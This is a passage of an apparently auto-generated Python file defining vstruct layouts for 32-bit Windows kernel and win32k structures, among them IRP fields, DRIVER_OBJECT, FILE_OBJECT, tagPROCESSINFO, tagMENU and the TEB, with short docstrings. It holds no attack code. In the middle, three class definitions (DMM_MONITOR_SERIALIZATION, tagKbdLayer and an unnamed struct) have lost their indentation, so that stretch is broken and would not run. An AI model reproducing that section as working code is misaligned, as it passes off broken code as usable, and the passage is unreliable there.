        self.AssociatedIrp = _unnamed_12389()
        self.ThreadListEntry = LIST_ENTRY()
        self.IoStatus = IO_STATUS_BLOCK()
        self.RequestorMode = v_uint8()
        self.PendingReturned = v_uint8()
        self.StackCount = v_uint8()
        self.CurrentLocation = v_uint8()
        self.Cancel = v_uint8()
        self.CancelIrql = v_uint8()
        self.ApcEnvironment = v_uint8()
        self.AllocationFlags = v_uint8()
        self.UserIosb = v_ptr32()
        self.UserEvent = v_ptr32()
        self.Overlay = _unnamed_12392()
        self.CancelRoutine = v_ptr32()
        self.UserBuffer = v_ptr32()
        self.Tail = _unnamed_12395()
class _unnamed_11700(vstruct.VStruct):
    """Anonymous 64-bit value split into low/high 32-bit halves."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.LowPart = v_uint32()
        self.HighPart = v_uint32()
class DRIVER_OBJECT(vstruct.VStruct):
    """Driver object: header, device-object chain, image bounds, name,
    entry-point pointers, and the 28-entry major-function dispatch
    table."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.Type = v_uint16()
        self.Size = v_uint16()
        self.DeviceObject = v_ptr32()
        self.Flags = v_uint32()
        self.DriverStart = v_ptr32()
        self.DriverSize = v_uint32()
        self.DriverSection = v_ptr32()
        self.DriverExtension = v_ptr32()
        self.DriverName = UNICODE_STRING()
        self.HardwareDatabase = v_ptr32()
        self.FastIoDispatch = v_ptr32()
        self.DriverInit = v_ptr32()
        self.DriverStartIo = v_ptr32()
        self.DriverUnload = v_ptr32()
        self.MajorFunction = vstruct.VArray([ v_ptr32() for i in xrange(28) ])
class MAILSLOT_CREATE_PARAMETERS(vstruct.VStruct):
    """Mailslot create parameters: quota, max message size, read timeout
    (7 trailing pad bytes to 0x18)."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.MailslotQuota = v_uint32()
        self.MaximumMessageSize = v_uint32()
        self.ReadTimeout = LARGE_INTEGER()
        self.TimeoutSpecified = v_uint8()
        self._pad0018 = v_bytes(size=7)
class DMM_VIDPN_SERIALIZATION(vstruct.VStruct):
    """Serialized VidPN: total size, active source count, then an offset
    array into per-source serializations (1 placeholder element)."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.Size = v_uint32()
        self.NumActiveSources = v_uint8()
        self._pad0008 = v_bytes(size=3)
        self.PathsFromSourceSerializationOffsets = vstruct.VArray([ v_uint32() for i in xrange(1) ])
class _unnamed_16606(vstruct.VStruct):
    """Anonymous embedded structure: priority plus two reserved words."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.Priority = v_uint32()
        self.Reserved1 = v_uint32()
        self.Reserved2 = v_uint32()
class _unnamed_16601(vstruct.VStruct):
    """Anonymous embedded structure: length plus a bus-number range."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.Length = v_uint32()
        self.MinBusNumber = v_uint32()
        self.MaxBusNumber = v_uint32()
        self.Reserved = v_uint32()
class IO_COMPLETION_CONTEXT(vstruct.VStruct):
    """I/O completion context: completion port and key pointers."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.Port = v_ptr32()
        self.Key = v_ptr32()
class DRIVER_EXTENSION(vstruct.VStruct):
    """Driver extension: driver backlink, AddDevice routine, device count,
    and the service registry key name."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.DriverObject = v_ptr32()
        self.AddDevice = v_ptr32()
        self.Count = v_uint32()
        self.ServiceKeyName = UNICODE_STRING()
class _unnamed_16084(vstruct.VStruct):
    """Anonymous embedded structure: three opaque 32-bit data words."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.Data = vstruct.VArray([ v_uint32() for i in xrange(3) ])
class DMM_COFUNCPATHSMODALITY_SERIALIZATION(vstruct.VStruct):
    """Serialized co-functional paths modality: path count plus an offset
    array to path/target mode sets (1 placeholder element)."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.NumPathsFromSource = v_uint8()
        self._pad0004 = v_bytes(size=3)
        self.PathAndTargetModeSetOffset = vstruct.VArray([ v_uint32() for i in xrange(1) ])
class tagTDB(vstruct.VStruct):
    """WOW task database entry: next link, event/priority counts, thread
    and WOW-thread-info pointers, task handle and flags."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.ptdbNext = v_ptr32()
        self.nEvents = v_uint32()
        self.nPriority = v_uint32()
        self.pti = v_ptr32()
        self.pwti = v_ptr32()
        self.hTaskWow = v_uint16()
        self.TDB_Flags = v_uint16()
class WHEA_PERSISTENCE_INFO(vstruct.VStruct):
    """WHEA persistence info packed into a single 64-bit signature word."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.Signature = v_uint64()
class WHEA_ERROR_RECORD_SECTION_DESCRIPTOR_VALIDBITS(vstruct.VStruct):
    """WHEA section-descriptor valid-bits byte (bitfields collapsed)."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.FRUId = v_uint8()
class tagWin32AllocStats(vstruct.VStruct):
    """Allocation statistics: max/current memory and allocation counters
    plus head-of-list pointer."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.dwMaxMem = v_uint32()
        self.dwCrtMem = v_uint32()
        self.dwMaxAlloc = v_uint32()
        self.dwCrtAlloc = v_uint32()
        self.pHead = v_ptr32()
class GENERAL_LOOKASIDE_POOL(vstruct.VStruct):
    """Lookaside pool — same field list as GENERAL_LOOKASIDE; kept as a
    separate type because the source headers declare both."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.ListHead = SLIST_HEADER()
        self.Depth = v_uint16()
        self.MaximumDepth = v_uint16()
        self.TotalAllocates = v_uint32()
        self.AllocateMisses = v_uint32()
        self.TotalFrees = v_uint32()
        self.FreeMisses = v_uint32()
        self.Type = v_uint32()
        self.Tag = v_uint32()
        self.Size = v_uint32()
        self.AllocateEx = v_ptr32()
        self.FreeEx = v_ptr32()
        self.ListEntry = LIST_ENTRY()
        self.LastTotalAllocates = v_uint32()
        self.LastAllocateMisses = v_uint32()
        self.Future = vstruct.VArray([ v_uint32() for i in xrange(2) ])
class EXCEPTION_RECORD(vstruct.VStruct):
    """Exception record: code/flags, nested-record and fault addresses,
    and up to 15 extra information words."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.ExceptionCode = v_uint32()
        self.ExceptionFlags = v_uint32()
        self.ExceptionRecord = v_ptr32()
        self.ExceptionAddress = v_ptr32()
        self.NumberParameters = v_uint32()
        self.ExceptionInformation = vstruct.VArray([ v_uint32() for i in xrange(15) ])
class HTOUCHINPUT(vstruct.VStruct):
    """Opaque handle type modeled as a single 32-bit value."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.unused = v_uint32()
class PROCESSOR_NUMBER(vstruct.VStruct):
    """Processor identity: group, number within group, reserved byte."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.Group = v_uint16()
        self.Number = v_uint8()
        self.Reserved = v_uint8()
class IMAGE_FILE_HEADER(vstruct.VStruct):
    """PE COFF file header: machine, section count, timestamp, symbol
    table info, optional-header size, characteristics."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.Machine = v_uint16()
        self.NumberOfSections = v_uint16()
        self.TimeDateStamp = v_uint32()
        self.PointerToSymbolTable = v_uint32()
        self.NumberOfSymbols = v_uint32()
        self.SizeOfOptionalHeader = v_uint16()
        self.Characteristics = v_uint16()
class tagPROCESSINFO(vstruct.VStruct):
    """Per-process USER info.

    Begins with the same field sequence as W32PROCESS (through DxProcess)
    and extends it with thread lists, desktop/window-station references,
    class lists, loaded-module bookkeeping, clipboard/IME state, and the
    startup info.  Field order is the layout contract; do not reorder.
    """
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.Process = v_ptr32()
        self.RefCount = v_uint32()
        self.W32PF_Flags = v_uint32()
        self.InputIdleEvent = v_ptr32()
        self.StartCursorHideTime = v_uint32()
        self.NextStart = v_ptr32()
        self.pDCAttrList = v_ptr32()
        self.pBrushAttrList = v_ptr32()
        self.W32Pid = v_uint32()
        self.GDIHandleCount = v_uint32()
        self.GDIHandleCountPeak = v_uint32()
        self.UserHandleCount = v_uint32()
        self.UserHandleCountPeak = v_uint32()
        self.GDIPushLock = EX_PUSH_LOCK()
        self.GDIEngUserMemAllocTable = RTL_AVL_TABLE()
        self.GDIDcAttrFreeList = LIST_ENTRY()
        self.GDIBrushAttrFreeList = LIST_ENTRY()
        self.GDIW32PIDLockedBitmaps = LIST_ENTRY()
        self.hSecureGdiSharedHandleTable = v_ptr32()
        self.DxProcess = v_ptr32()
        self.ptiList = v_ptr32()
        self.ptiMainThread = v_ptr32()
        self.rpdeskStartup = v_ptr32()
        self.pclsPrivateList = v_ptr32()
        self.pclsPublicList = v_ptr32()
        self.pwpi = v_ptr32()
        self.ppiNext = v_ptr32()
        self.ppiNextRunning = v_ptr32()
        self.cThreads = v_uint32()
        self.hdeskStartup = v_ptr32()
        self.cSysExpunge = v_uint32()
        self.dwhmodLibLoadedMask = v_uint32()
        self.ahmodLibLoaded = vstruct.VArray([ v_ptr32() for i in xrange(32) ])
        self.rpwinsta = v_ptr32()
        self.hwinsta = v_ptr32()
        self.amwinsta = v_uint32()
        self.dwHotkey = v_uint32()
        self.hMonitor = v_ptr32()
        self.pdvList = v_ptr32()
        self.iClipSerialNumber = v_uint32()
        self.bmHandleFlags = RTL_BITMAP()
        self.pCursorCache = v_ptr32()
        self.pClientBase = v_ptr32()
        self.dwLpkEntryPoints = v_uint32()
        self.pW32Job = v_ptr32()
        self.dwImeCompatFlags = v_uint32()
        self.luidSession = LUID()
        self.usi = tagUSERSTARTUPINFO()
        self.Flags = v_uint32()
        self.dwLayout = v_uint32()
        self.pHidTable = v_ptr32()
        self.dwRegisteredClasses = v_uint32()
        self.pvwplWndGCList = v_ptr32()
class HKL(vstruct.VStruct):
    """Opaque keyboard-layout handle modeled as a single 32-bit value."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.unused = v_uint32()
class FLOATING_SAVE_AREA(vstruct.VStruct):
    """x87 FPU save area: control/status/tag words, error and data
    selectors, 80-byte register area, and Cr0 NPX state."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.ControlWord = v_uint32()
        self.StatusWord = v_uint32()
        self.TagWord = v_uint32()
        self.ErrorOffset = v_uint32()
        self.ErrorSelector = v_uint32()
        self.DataOffset = v_uint32()
        self.DataSelector = v_uint32()
        self.RegisterArea = vstruct.VArray([ v_uint8() for i in xrange(80) ])
        self.Cr0NpxState = v_uint32()
class PEB_LDR_DATA(vstruct.VStruct):
    """Loader data: the three module lists (load/memory/initialization
    order) plus shutdown bookkeeping."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.Length = v_uint32()
        self.Initialized = v_uint8()
        self._pad0008 = v_bytes(size=3)
        self.SsHandle = v_ptr32()
        self.InLoadOrderModuleList = LIST_ENTRY()
        self.InMemoryOrderModuleList = LIST_ENTRY()
        self.InInitializationOrderModuleList = LIST_ENTRY()
        self.EntryInProgress = v_ptr32()
        self.ShutdownInProgress = v_uint8()
        self._pad002c = v_bytes(size=3)
        self.ShutdownThreadId = v_ptr32()
class _unnamed_12724(vstruct.VStruct):
    """Anonymous embedded structure: a single SRB pointer."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.Srb = v_ptr32()
class _unnamed_12720(vstruct.VStruct):
    """Anonymous embedded structure: VPB and device-object pointers."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.Vpb = v_ptr32()
        self.DeviceObject = v_ptr32()
class DMM_MONITORFREQUENCYRANGESET_SERIALIZATION(vstruct.VStruct):
    """Serialized monitor frequency-range set: count byte, 3 pad bytes,
    then a variable-length range array (1 placeholder element)."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.NumFrequencyRanges = v_uint8()
        self._pad0004 = v_bytes(size=3)
        self.FrequencyRangeSerialization = vstruct.VArray([ D3DKMDT_MONITOR_FREQUENCY_RANGE() for i in xrange(1) ])
class SECURITY_SUBJECT_CONTEXT(vstruct.VStruct):
    """Security subject context: client/primary tokens, impersonation
    level, and process audit id."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.ClientToken = v_ptr32()
        self.ImpersonationLevel = v_uint32()
        self.PrimaryToken = v_ptr32()
        self.ProcessAuditId = v_ptr32()
class DMM_MONITOR_SERIALIZATION(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.Size = v_uint32()
self.VideoPresentTargetId = v_uint32()
self.Orientation = v_uint32()
self.IsSimulatedMonitor = v_uint8()
self.IsUsingDefaultProfile = v_uint8()
self._pad0010 = v_bytes(size=2)
self.ModePruningAlgorithm = v_uint32()
self.MonitorPowerState = v_uint32()
self.SourceModeSetOffset = v_uint32()
self.FrequencyRangeSetOffset = v_uint32()
self.DescriptorSetOffset = v_uint32()
self.MonitorType = v_uint32()
class tagKbdLayer(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.pCharModifiers = v_ptr32()
self.pVkToWcharTable = v_ptr32()
self.pDeadKey = v_ptr32()
self.pKeyNames = v_ptr32()
self.pKeyNamesExt = v_ptr32()
self.pKeyNamesDead = v_ptr32()
self.pusVSCtoVK = v_ptr32()
self.bMaxVSCtoVK = v_uint8()
self._pad0020 = v_bytes(size=3)
self.pVSCtoVK_E0 = v_ptr32()
self.pVSCtoVK_E1 = v_ptr32()
self.fLocaleFlags = v_uint32()
self.nLgMax = v_uint8()
self.cbLgEntry = v_uint8()
self._pad0030 = v_bytes(size=2)
self.pLigature = v_ptr32()
self.dwType = v_uint32()
self.dwSubType = v_uint32()
class _unnamed_11687(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.LowPart = v_uint32()
self.HighPart = v_uint32()
# --- Auto-generated vstruct definitions (continued); field order is layout. ---
class tagMSG(vstruct.VStruct):
    # User-mode window message (MSG) record.
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.hwnd = v_ptr32()
        self.message = v_uint32()
        self.wParam = v_uint32()
        self.lParam = v_uint32()
        self.time = v_uint32()
        self.pt = tagPOINT()
class HWND(vstruct.VStruct):
    # Opaque window handle placeholder.
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.unused = v_uint32()
class INTERFACE(vstruct.VStruct):
    # Generic kernel interface header (size/version + ref/deref callbacks).
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.Size = v_uint16()
        self.Version = v_uint16()
        self.Context = v_ptr32()
        self.InterfaceReference = v_ptr32()
        self.InterfaceDereference = v_ptr32()
class SLIST_HEADER(vstruct.VStruct):
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.Alignment = v_uint64()
class FILE_STANDARD_INFORMATION(vstruct.VStruct):
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.AllocationSize = LARGE_INTEGER()
        self.EndOfFile = LARGE_INTEGER()
        self.NumberOfLinks = v_uint32()
        self.DeletePending = v_uint8()
        self.Directory = v_uint8()
        self._pad0018 = v_bytes(size=2)
class _unnamed_13037(vstruct.VStruct):
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.InitialPrivilegeSet = INITIAL_PRIVILEGE_SET()
class IMAGE_DATA_DIRECTORY(vstruct.VStruct):
    # PE data-directory entry: RVA + size.
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.VirtualAddress = v_uint32()
        self.Size = v_uint32()
class FILE_OBJECT(vstruct.VStruct):
    # NT kernel FILE_OBJECT: an open instance of a file/device.
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.Type = v_uint16()
        self.Size = v_uint16()
        self.DeviceObject = v_ptr32()
        self.Vpb = v_ptr32()
        self.FsContext = v_ptr32()
        self.FsContext2 = v_ptr32()
        self.SectionObjectPointer = v_ptr32()
        self.PrivateCacheMap = v_ptr32()
        self.FinalStatus = v_uint32()
        self.RelatedFileObject = v_ptr32()
        self.LockOperation = v_uint8()
        self.DeletePending = v_uint8()
        self.ReadAccess = v_uint8()
        self.WriteAccess = v_uint8()
        self.DeleteAccess = v_uint8()
        self.SharedRead = v_uint8()
        self.SharedWrite = v_uint8()
        self.SharedDelete = v_uint8()
        self.Flags = v_uint32()
        self.FileName = UNICODE_STRING()
        self.CurrentByteOffset = LARGE_INTEGER()
        self.Waiters = v_uint32()
        self.Busy = v_uint32()
        self.LastLock = v_ptr32()
        self.Lock = KEVENT()
        self.Event = KEVENT()
        self.CompletionContext = v_ptr32()
        self.IrpListLock = v_uint32()
        self.IrpList = LIST_ENTRY()
        self.FileObjectExtension = v_ptr32()
# --- Auto-generated vstruct definitions (continued); field order is layout. ---
class tagWOWPROCESSINFO(vstruct.VStruct):
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.pwpiNext = v_ptr32()
        self.ptiScheduled = v_ptr32()
        self.ptdbHead = v_ptr32()
        self.lpfnWowExitTask = v_ptr32()
        self.pEventWowExec = v_ptr32()
        self.hEventWowExecClient = v_ptr32()
        self.nSendLock = v_uint32()
        self.nRecvLock = v_uint32()
        self.CSOwningThread = v_ptr32()
        self.CSLockCount = v_uint32()
class tagMENU(vstruct.VStruct):
    # win32k menu object.
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.head = PROCDESKHEAD()
        self.fFlags = v_uint32()
        self.iItem = v_uint32()
        self.cAlloced = v_uint32()
        self.cItems = v_uint32()
        self.cxMenu = v_uint32()
        self.cyMenu = v_uint32()
        self.cxTextAlign = v_uint32()
        self.spwndNotify = v_ptr32()
        self.rgItems = v_ptr32()
        self.pParentMenus = v_ptr32()
        self.dwContextHelpId = v_uint32()
        self.cyMax = v_uint32()
        self.dwMenuData = v_uint32()
        self.hbrBack = v_ptr32()
        self.iTop = v_uint32()
        self.iMaxTop = v_uint32()
        self.dwArrowsOn = v_uint32()
        self.umpm = tagUAHMENUPOPUPMETRICS()
class ERESOURCE(vstruct.VStruct):
    # Executive reader/writer resource lock.
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.SystemResourcesList = LIST_ENTRY()
        self.OwnerTable = v_ptr32()
        self.ActiveCount = v_uint16()
        self.Flag = v_uint16()
        self.SharedWaiters = v_ptr32()
        self.ExclusiveWaiters = v_ptr32()
        self.OwnerEntry = OWNER_ENTRY()
        self.ActiveEntries = v_uint32()
        self.ContentionCount = v_uint32()
        self.NumberOfSharedWaiters = v_uint32()
        self.NumberOfExclusiveWaiters = v_uint32()
        self.Address = v_ptr32()
        self.SpinLock = v_uint32()
class ACCESS_REASONS(vstruct.VStruct):
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.Data = vstruct.VArray([ v_uint32() for i in xrange(32) ])
class THRDESKHEAD(vstruct.VStruct):
    # Common header of thread/desktop-owned user objects.
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.h = v_ptr32()
        self.cLockObj = v_uint32()
        self.pti = v_ptr32()
        self.rpdesk = v_ptr32()
        self.pSelf = v_ptr32()
class _unnamed_16090(vstruct.VStruct):
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.DataSize = v_uint32()
        self.Reserved1 = v_uint32()
        self.Reserved2 = v_uint32()
class tagPOPUPMENU(vstruct.VStruct):
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.fIsMenuBar = v_uint32()
        self.spwndNotify = v_ptr32()
        self.spwndPopupMenu = v_ptr32()
        self.spwndNextPopup = v_ptr32()
        self.spwndPrevPopup = v_ptr32()
        self.spmenu = v_ptr32()
        self.spmenuAlternate = v_ptr32()
        self.spwndActivePopup = v_ptr32()
        self.ppopupmenuRoot = v_ptr32()
        self.ppmDelayedFree = v_ptr32()
        self.posSelectedItem = v_uint32()
        self.posDropped = v_uint32()
class TP_TASK_CALLBACKS(vstruct.VStruct):
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.ExecuteCallback = v_ptr32()
        self.Unposted = v_ptr32()
class _unnamed_16097(vstruct.VStruct):
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.Start = LARGE_INTEGER()
        self.Length48 = v_uint32()
class _unnamed_16094(vstruct.VStruct):
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.Start = LARGE_INTEGER()
        self.Length40 = v_uint32()
class RTL_BALANCED_LINKS(vstruct.VStruct):
    # AVL tree node links (RTL_AVL_TABLE).
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.Parent = v_ptr32()
        self.LeftChild = v_ptr32()
        self.RightChild = v_ptr32()
        self.Balance = v_uint8()
        self.Reserved = vstruct.VArray([ v_uint8() for i in xrange(3) ])
class HANDLEENTRY(vstruct.VStruct):
    # win32k user handle-table entry.
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.phead = v_ptr32()
        self.pOwner = v_ptr32()
        self.bType = v_uint8()
        self.bFlags = v_uint8()
        self.wUniq = v_uint16()
class VK_FUNCTION_PARAM(vstruct.VStruct):
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.NLSFEProcIndex = v_uint8()
        self._pad0004 = v_bytes(size=3)
        self.NLSFEProcParam = v_uint32()
# --- Auto-generated vstruct definitions (continued); field order is layout. ---
class EX_PUSH_LOCK(vstruct.VStruct):
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.Locked = v_uint32()
class D3DMATRIX(vstruct.VStruct):
    # 4x4 Direct3D matrix; generator renamed the _NN fields with a leading
    # underscore to make them valid Python identifiers.
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self._11 = v_uint32()
        self._12 = v_uint32()
        self._13 = v_uint32()
        self._14 = v_uint32()
        self._21 = v_uint32()
        self._22 = v_uint32()
        self._23 = v_uint32()
        self._24 = v_uint32()
        self._31 = v_uint32()
        self._32 = v_uint32()
        self._33 = v_uint32()
        self._34 = v_uint32()
        self._41 = v_uint32()
        self._42 = v_uint32()
        self._43 = v_uint32()
        self._44 = v_uint32()
class _unnamed_13453(vstruct.VStruct):
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.ActiveSize = D3DKMDT_2DREGION()
class CONSOLE_CARET_INFO(vstruct.VStruct):
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.hwnd = v_ptr32()
        self.rc = tagRECT()
class D3DKMDT_VIDPN_PRESENT_PATH_ROTATION_SUPPORT(vstruct.VStruct):
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.Identity = v_uint32()
class WHEA_ERROR_RECORD_HEADER(vstruct.VStruct):
    # Windows Hardware Error Architecture record header.
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.Signature = v_uint32()
        self.Revision = WHEA_REVISION()
        self.SignatureEnd = v_uint32()
        self.SectionCount = v_uint16()
        self.Severity = v_uint32()
        self.ValidBits = WHEA_ERROR_RECORD_HEADER_VALIDBITS()
        self.Length = v_uint32()
        self.Timestamp = WHEA_TIMESTAMP()
        self.PlatformId = GUID()
        self.PartitionId = GUID()
        self.CreatorId = GUID()
        self.NotifyType = GUID()
        self.RecordId = v_uint64()
        self.Flags = WHEA_ERROR_RECORD_HEADER_FLAGS()
        self.PersistenceInfo = WHEA_PERSISTENCE_INFO()
        self.Reserved = vstruct.VArray([ v_uint8() for i in xrange(12) ])
class EVENT_DESCRIPTOR(vstruct.VStruct):
    # ETW event descriptor (id/version/channel/level/opcode/task/keyword).
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.Id = v_uint16()
        self.Version = v_uint8()
        self.Channel = v_uint8()
        self.Level = v_uint8()
        self.Opcode = v_uint8()
        self.Task = v_uint16()
        self.Keyword = v_uint64()
class tagSBCALC(vstruct.VStruct):
    # Scrollbar geometry calculations.
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.posMin = v_uint32()
        self.posMax = v_uint32()
        self.page = v_uint32()
        self.pos = v_uint32()
        self.pxTop = v_uint32()
        self.pxBottom = v_uint32()
        self.pxLeft = v_uint32()
        self.pxRight = v_uint32()
        self.cpxThumb = v_uint32()
        self.pxUpArrow = v_uint32()
        self.pxDownArrow = v_uint32()
        self.pxStart = v_uint32()
        self.pxThumbBottom = v_uint32()
        self.pxThumbTop = v_uint32()
        self.cpx = v_uint32()
        self.pxMin = v_uint32()
class _unnamed_12451(vstruct.VStruct):
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.ListEntry = LIST_ENTRY()
        self._pad0028 = v_bytes(size=32)
class tagSBINFO(vstruct.VStruct):
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.WSBflags = v_uint32()
        self.Horz = tagSBDATA()
        self.Vert = tagSBDATA()
class FLS_CALLBACK_INFO(vstruct.VStruct):
    # Opaque in the original headers: no public fields.
    def __init__(self):
        vstruct.VStruct.__init__(self)
class _unnamed_11733(vstruct.VStruct):
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.LongFunction = v_uint32()
class _unnamed_11730(vstruct.VStruct):
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.Flags = v_uint32()
class LIST_ENTRY64(vstruct.VStruct):
    # 64-bit doubly-linked list entry.
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.Flink = v_uint64()
        self.Blink = v_uint64()
class tagOEMBITMAPINFO(vstruct.VStruct):
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.x = v_uint32()
        self.y = v_uint32()
        self.cx = v_uint32()
        self.cy = v_uint32()
# --- Auto-generated vstruct definitions (continued); field order is layout. ---
class WAIT_CONTEXT_BLOCK(vstruct.VStruct):
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.WaitQueueEntry = KDEVICE_QUEUE_ENTRY()
        self.DeviceRoutine = v_ptr32()
        self.DeviceContext = v_ptr32()
        self.NumberOfMapRegisters = v_uint32()
        self.DeviceObject = v_ptr32()
        self.CurrentIrp = v_ptr32()
        self.BufferChainingDpc = v_ptr32()
class _unnamed_16072(vstruct.VStruct):
    # Interrupt resource descriptor payload (group/count/vector/affinity).
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.Group = v_uint16()
        self.MessageCount = v_uint16()
        self.Vector = v_uint32()
        self.Affinity = v_uint32()
class ACTIVATION_CONTEXT_STACK(vstruct.VStruct):
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.ActiveFrame = v_ptr32()
        self.FrameListCache = LIST_ENTRY()
        self.Flags = v_uint32()
        self.NextCookieSequenceNumber = v_uint32()
        self.StackId = v_uint32()
class tagITEM(vstruct.VStruct):
    # A single menu item inside a tagMENU.rgItems array.
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.fType = v_uint32()
        self.fState = v_uint32()
        self.wID = v_uint32()
        self.spSubMenu = v_ptr32()
        self.hbmpChecked = v_ptr32()
        self.hbmpUnchecked = v_ptr32()
        self.lpstr = v_ptr32()
        self.cch = v_uint32()
        self.dwItemData = v_uint32()
        self.xItem = v_uint32()
        self.yItem = v_uint32()
        self.cxItem = v_uint32()
        self.cyItem = v_uint32()
        self.dxTab = v_uint32()
        self.ulX = v_uint32()
        self.ulWidth = v_uint32()
        self.hbmp = v_ptr32()
        self.cxBmp = v_uint32()
        self.cyBmp = v_uint32()
        self.umim = tagUAHMENUITEMMETRICS()
class LOOKASIDE_LIST_EX(vstruct.VStruct):
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.L = GENERAL_LOOKASIDE_POOL()
# --- Auto-generated vstruct definition; field order is layout. ---
class TEB(vstruct.VStruct):
    # 32-bit Thread Environment Block (per-thread user-mode state; base of FS
    # segment on x86). Do not reorder fields -- offsets must match the native TEB.
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.NtTib = NT_TIB()
        self.EnvironmentPointer = v_ptr32()
        self.ClientId = CLIENT_ID()
        self.ActiveRpcHandle = v_ptr32()
        self.ThreadLocalStoragePointer = v_ptr32()
        self.ProcessEnvironmentBlock = v_ptr32()
        self.LastErrorValue = v_uint32()
        self.CountOfOwnedCriticalSections = v_uint32()
        self.CsrClientThread = v_ptr32()
        self.Win32ThreadInfo = v_ptr32()
        self.User32Reserved = vstruct.VArray([ v_uint32() for i in xrange(26) ])
        self.UserReserved = vstruct.VArray([ v_uint32() for i in xrange(5) ])
        self.WOW32Reserved = v_ptr32()
        self.CurrentLocale = v_uint32()
        self.FpSoftwareStatusRegister = v_uint32()
        self.SystemReserved1 = vstruct.VArray([ v_ptr32() for i in xrange(54) ])
        self.ExceptionCode = v_uint32()
        self.ActivationContextStackPointer = v_ptr32()
        self.SpareBytes = vstruct.VArray([ v_uint8() for i in xrange(36) ])
        self.TxFsContext = v_uint32()
        self.GdiTebBatch = GDI_TEB_BATCH()
        self.RealClientId = CLIENT_ID()
        self.GdiCachedProcessHandle = v_ptr32()
        self.GdiClientPID = v_uint32()
        self.GdiClientTID = v_uint32()
        self.GdiThreadLocalInfo = v_ptr32()
        self.Win32ClientInfo = vstruct.VArray([ v_uint32() for i in xrange(62) ])
        self.glDispatchTable = vstruct.VArray([ v_ptr32() for i in xrange(233) ])
        self.glReserved1 = vstruct.VArray([ v_uint32() for i in xrange(29) ])
        self.glReserved2 = v_ptr32()
        self.glSectionInfo = v_ptr32()
        self.glSection = v_ptr32()
        self.glTable = v_ptr32()
        self.glCurrentRC = v_ptr32()
        self.glContext = v_ptr32()
        self.LastStatusValue = v_uint32()
        self.StaticUnicodeString = UNICODE_STRING()
        self.StaticUnicodeBuffer = vstruct.VArray([ v_uint16() for i in xrange(261) ])
        self._pad0e0c = v_bytes(size=2)
        self.DeallocationStack = v_ptr32()
        self.TlsSlots = vstruct.VArray([ v_ptr32() for i in xrange(64) ])
        self.TlsLinks = LIST_ENTRY()
        self.Vdm = v_ptr32()
        self.ReservedForNtRpc = v_ptr32()
        self.DbgSsReserved = vstruct.VArray([ v_ptr32() for i in xrange(2) ])
        self.HardErrorMode = v_uint32()
        self.Instrumentation = vstruct.VArray([ v_ptr32() for i in xrange(9) ])
        self.ActivityId = GUID()
        self.SubProcessTag = v_ptr32()
        self.EtwLocalData = v_ptr32()
